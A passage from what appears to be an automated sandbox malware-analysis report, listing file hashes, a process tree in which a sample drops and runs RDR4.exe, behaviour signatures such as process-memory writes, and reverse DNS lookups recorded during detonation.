memory/956-537-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

memory/956-536-0x0000028338BD0000-0x0000028338BFA000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 4ac1741ceb19f5a983079b2c5f344f5d
SHA1 f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA256 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 a9124c4c97cba8a07a8204fac1696c8e
SHA1 1f27d80280e03762c7b16781608786f5a98ff434
SHA256 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Analysis: behavioral28

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

95s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RDR4.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5060 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe C:\Users\Admin\AppData\Local\Temp\RDR4.exe
PID 5060 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe C:\Users\Admin\AppData\Local\Temp\RDR4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe"

C:\Users\Admin\AppData\Local\Temp\RDR4.exe

"C:\Users\Admin\AppData\Local\Temp\RDR4.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp

Files

memory/5060-0-0x00007FF98B8D3000-0x00007FF98B8D5000-memory.dmp

memory/5060-1-0x0000000000F20000-0x00000000013F2000-memory.dmp

memory/5060-3-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RDR4.exe

MD5 e685b0c231a5f25f451e3b1628c3a55d
SHA1 6546666fb75e56302f140db8c8e9299e2ae1175b
SHA256 65d2f65bcb32cba0a2d920bec6b139bf5de4de8ad2d44db7ad7bb36035665797
SHA512 f991446d9b556bf00c25f348000a75bda67571f0de53a9947c679f483bdae8e7d28728270de530d833321a484a7050c96b57a3c10273bba87e04dd8f07cc03a4

memory/1312-13-0x00007FF6708A0000-0x00007FF6708CD000-memory.dmp

memory/5060-17-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp